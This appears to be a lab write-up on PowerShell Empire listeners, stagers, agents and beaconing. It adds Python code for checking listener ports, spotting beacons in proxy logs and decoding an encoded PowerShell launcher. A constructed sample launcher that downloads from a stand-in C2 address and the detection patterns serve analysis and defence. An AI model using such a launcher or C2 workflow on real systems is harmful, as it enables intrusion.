PowerShell Empire 101

Exploring key concepts of PowerShell Empire: listeners, stagers, agents, beaconing, and the traces they leave behind.

Listener

attacker@local
// Empire commands used
?
uselistener meterpreter
info

Starting the listener:

Stager

A stager is a small piece of code that downloads and executes the final payload, which in turn calls back to the listener set up previously (here, the meterpreter listener). Below shows how to set it up:

A quick look at the stager code:

Issues

Various stagers I generated for the meterpreter listener were giving me errors like the ones below:

and this:

After looking at the traffic and running a quick nmap scan, it seemed like there may be a bug in Empire's uselistener module when used with meterpreter: for some reason it never actually binds the port, so nothing is listening for the stager's callback:

To test this assumption, I created another http listener on port 80, which worked immediately. That leaves the meterpreter listener looking buggy, at least in my environment:
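Before blaming a stager, it is worth confirming that the listener really bound its port, which is what the nmap scan above does. The following is an added example (not code from the original page or from Empire) that performs the same check from Python: a TCP connect to each listener's port, reported per listener. The dummy loopback listener and the port numbers in the demo are assumptions used only to make the check runnable offline.

```python
import socket
from typing import Dict


def tcp_port_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP three-way handshake to host:port completes.

    A listener that claims to be "started" but never bound its socket will
    refuse (or time out on) the connect, which is what nmap reports as closed.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def check_listeners(host: str, listeners: Dict[str, int]) -> Dict[str, bool]:
    """Map each listener name to whether its port is reachable on host."""
    return {name: tcp_port_open(host, port) for name, port in listeners.items()}


def start_dummy_listener() -> socket.socket:
    """Bind a throwaway TCP listener on 127.0.0.1 as a stand-in for a
    listener that really did open its port. Port 0 lets the OS pick a free one."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv


if __name__ == "__main__":
    # Assumed ports: the dummy stands in for the working http listener,
    # 443 is an assumed port for the meterpreter listener that never bound.
    good = start_dummy_listener()
    bound_port = good.getsockname()[1]
    report = check_listeners(
        "127.0.0.1",
        {"http (bound)": bound_port, "meterpreter (assumed 443)": 443},
    )
    for name, ok in report.items():
        print(f"{name:28s} {'LISTENING' if ok else 'NOT LISTENING'}")
    good.close()
```

Run it on the Empire host against the ports shown by `info` for each listener; a `NOT LISTENING` line for a listener Empire reports as started is the symptom described above.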

Agent

An agent is essentially a compromised victim system that has called back to the listener and is now ready to receive commands.

Continuing the testing with the http listener and a multi/launcher stager, an agent is finally returned once launcher.ps1 (the stager) is executed on the victim system:

Let's try getting one more agent back from another machine via WMI lateral movement:

Beaconing

With the default http listener profile in place, these are the URLs most commonly requested by the agent when it beacons back to the listener:

The packet data in any of those beacons:
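To see what those beacons look like from the network side, here is an added example (not part of the original page or of Empire) that runs over a few constructed proxy-log lines. The three URIs and the user agent are the values the default Empire http listener profile is commonly documented with; treat them as assumptions to check against the `info` output of your own listener, because an operator can change every one of them. The cadence check is included precisely because the profile strings are easy to change, while a fixed sleep with little jitter is harder to hide.

```python
import statistics
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple
from urllib.parse import urlparse

# Assumed default http listener profile (URIs and user agent). Verify against
# `info` on your listener; an operator can change every one of these strings.
EMPIRE_DEFAULT_URIS = {"/admin/get.php", "/news.php", "/login/process.php"}
EMPIRE_DEFAULT_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"

# Constructed proxy log (tab separated): timestamp, client, method, URL, status, user agent.
# 10.0.0.7 beacons every 5 s to the profile URIs with the profile user agent;
# 10.0.0.9 is ordinary browsing that happens to touch a /news.php once.
SAMPLE_PROXY_LOG = """\
2019-01-01T10:00:00\t10.0.0.7\tGET\thttp://203.0.113.5/admin/get.php\t200\tMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
2019-01-01T10:00:05\t10.0.0.7\tGET\thttp://203.0.113.5/news.php\t200\tMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
2019-01-01T10:00:10\t10.0.0.7\tPOST\thttp://203.0.113.5/login/process.php\t200\tMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
2019-01-01T10:00:15\t10.0.0.7\tGET\thttp://203.0.113.5/admin/get.php\t200\tMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
2019-01-01T10:00:03\t10.0.0.9\tGET\thttp://example.com/index.html\t200\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/70.0
2019-01-01T10:07:41\t10.0.0.9\tGET\thttp://example.com/about.html\t200\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/70.0
2019-01-01T10:09:12\t10.0.0.9\tGET\thttp://example.com/news.php\t404\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/70.0
"""

Flow = Tuple[str, str]  # (client, destination host)


def parse_proxy_log(text: str) -> List[dict]:
    """Split the constructed log format into dicts with parsed timestamp and URL parts."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, method, url, status, ua = line.split("\t")
        u = urlparse(url)
        rows.append({"ts": datetime.fromisoformat(ts), "src": src, "method": method,
                     "host": u.netloc, "path": u.path, "status": int(status), "ua": ua})
    return rows


def find_empire_beacons(rows: List[dict], min_hits: int = 3,
                        max_jitter: float = 0.2) -> Dict[Flow, List[str]]:
    """Score each (client, host) flow on profile URIs, profile UA and cadence.

    A flow is reported when at least one profile URI was requested AND there is
    corroboration: the profile user agent, several profile hits, or a regular
    inter-request interval (relative std-dev below max_jitter).
    """
    flows: Dict[Flow, List[dict]] = defaultdict(list)
    for r in rows:
        flows[(r["src"], r["host"])].append(r)

    findings: Dict[Flow, List[str]] = {}
    for key, reqs in flows.items():
        reqs.sort(key=lambda r: r["ts"])
        uri_hits = sum(r["path"] in EMPIRE_DEFAULT_URIS for r in reqs)
        ua_hit = any(r["ua"] == EMPIRE_DEFAULT_UA for r in reqs)
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(reqs, reqs[1:])]
        mean, regular = 0.0, False
        if len(gaps) >= 2:
            mean = statistics.mean(gaps)
            regular = mean > 0 and statistics.pstdev(gaps) / mean <= max_jitter

        reasons = []
        if ua_hit:
            reasons.append("default Empire user agent")
        if uri_hits >= min_hits:
            reasons.append(f"{uri_hits} requests to default profile URIs")
        if regular and uri_hits:
            reasons.append(f"regular cadence ~{mean:.0f}s")
        if uri_hits and (ua_hit or uri_hits >= min_hits or regular):
            findings[key] = reasons
    return findings


if __name__ == "__main__":
    for (client, host), why in find_empire_beacons(parse_proxy_log(SAMPLE_PROXY_LOG)).items():
        print(f"{client} -> {host}: {'; '.join(why)}")
```

The single 404 for /news.php from the browsing client is not reported: one profile-path hit with a different user agent and irregular timing is not enough, which keeps the rule from firing on every site that happens to host a file with one of those names.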

Observations

Note how executing the stager launcher.ps1 spawned a second powershell instance, and that both the parent and the child windows are hidden. Note also that the child powershell was invoked with an encoded command line:

Stager's command line in base64:

The decoded command line, with the notable parts being the user agent, the C2 server and a session cookie:
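Decoding that command line is something an analyst does repeatedly, whether it comes from a process-creation event, a PowerShell log or a transcript, so here it is as an added example (not code from the original page or from Empire). The `-enc` argument is base64 of the script in UTF-16LE, which is why pasting it into an ordinary base64 decoder yields text interleaved with null bytes. The launcher body used as sample input is constructed to have the same shape as what the decoded screenshot shows (WebClient, hard-coded user agent, server, URI and cookie); it is not Empire's real launcher, and the variable names, IP, cookie value and helper names are assumptions.

```python
import base64
import re
from typing import Dict, Optional

# Constructed stand-in for a launcher body, same shape as the decoded command line
# discussed above. NOT Empire's real launcher; names and values are assumptions.
SAMPLE_LAUNCHER = (
    "$wc=New-Object System.Net.WebClient;"
    "$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';"
    "$ser='http://203.0.113.5:80';$t='/login/process.php';"
    "$wc.Headers.Add('User-Agent',$u);"
    "$wc.Headers.Add('Cookie','session=Pb4xm9fIaSmkLFwjK0cZ1dN7OVU=');"
    "$data=$wc.DownloadData($ser+$t);"
)


def encode_command(script: str) -> str:
    """Build an -enc argument the way powershell.exe expects it: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command line of the kind seen in the process tree above.
SAMPLE_CMDLINE = "powershell -noP -sta -w 1 -enc " + encode_command(SAMPLE_LAUNCHER)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; longest first.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
STRING_ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script from a command line, or None if no -enc argument."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def _header_value(script: str, name: str, variables: Dict[str, str]) -> Optional[str]:
    """Value passed to Headers.Add('<name>', ...), resolving $var to its string assignment."""
    pat = r"Headers\.Add\(\s*['\"]" + re.escape(name) + r"['\"]\s*,\s*(\$\w+|'[^']*'|\"[^\"]*\")"
    m = re.search(pat, script, re.IGNORECASE)
    if not m:
        return None
    tok = m.group(1)
    return variables.get(tok[1:]) if tok.startswith("$") else tok[1:-1]


def extract_indicators(script: str) -> Dict[str, Optional[str]]:
    """Pull the hunting-relevant fields out of a decoded launcher: UA, C2, URI, cookie."""
    variables = dict(STRING_ASSIGN.findall(script))
    cookie = _header_value(script, "Cookie", variables) or ""
    session = re.search(r"session=([^'\";]+)", cookie)
    c2 = re.search(r"https?://[^'\"\s]+", script)
    uri = re.search(r"'(/[^']*)'", script)
    return {
        "user_agent": _header_value(script, "User-Agent", variables),
        "c2_server": c2.group(0) if c2 else None,
        "uri": uri.group(1) if uri else None,
        "session_cookie": session.group(1) if session else None,
    }


if __name__ == "__main__":
    decoded = decode_encoded_command(SAMPLE_CMDLINE)
    print(decoded)
    for k, v in extract_indicators(decoded).items():
        print(f"{k:15s} {v}")
```

The extracted user agent, server and URI are exactly the values to pivot on in proxy logs, and the session cookie ties the stager to the agent's later beacons.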

Logs

If we filter our SIEM down to the powershell process that Empire infected, the beacons stand out:

A compromised system can generate event 800 entries in the Windows PowerShell log (PowerShell 5.0+) showing the following:

There are also loads of 4103 (module logging) events in Microsoft-Windows-PowerShell/Operational:

In the same way, if PowerShell transcript logging is enabled, the stager execution is captured there as well:

Memory Dumps

A memory dump can also reveal the same stager activity:

References

https://www.sans.org/reading-room/whitepapers/incident/disrupting-empire-identifying-powershell-empire-command-control-activity-38315
